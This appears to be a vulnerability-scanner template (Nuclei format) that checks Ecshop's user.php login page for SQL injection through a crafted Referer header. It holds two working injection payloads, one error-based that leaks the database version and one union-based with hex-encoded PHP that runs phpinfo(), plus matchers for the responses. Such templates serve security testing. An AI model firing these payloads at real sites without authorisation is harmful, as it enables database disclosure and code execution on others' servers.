id: ecshop-sqli

info:
  name: Ecshop SQLi
  author: Lark-lab,ImNightmaree,ritikchaddha
  severity: high
  description: A vulnerability in Ecshop allows remote unauthenticated users to inject arbitrary SQL statements via the 'Referer' header field.
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
    - http://www.wins21.com/mobile/blog/blog_view.html?num=1172
  tags: sqli,php,ecshop

requests:
  - raw:
      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}

      - |
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:110:"*/ union select 1,0x27202f2a,3,4,5,6,7,8,0x7b24616263275d3b6563686f20706870696e666f2f2a2a2f28293b2f2f7d,10-- -";s:2:"id";s:4:"'/*";}554fcae493e564ee0dc75bdf2ebf94ca

    # Either matcher below is sufficient to report a finding.
    matchers-condition: or
    matchers:
      # All four database error strings must appear in the response.
      - type: word
        words:
          - 'XPATH syntax error:'
          - '[error] =>'
          - '[0] => Array'
          - 'MySQL server error report:Array'
        condition: and

      # Both phpinfo() output strings must appear in the response.
      - type: word
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and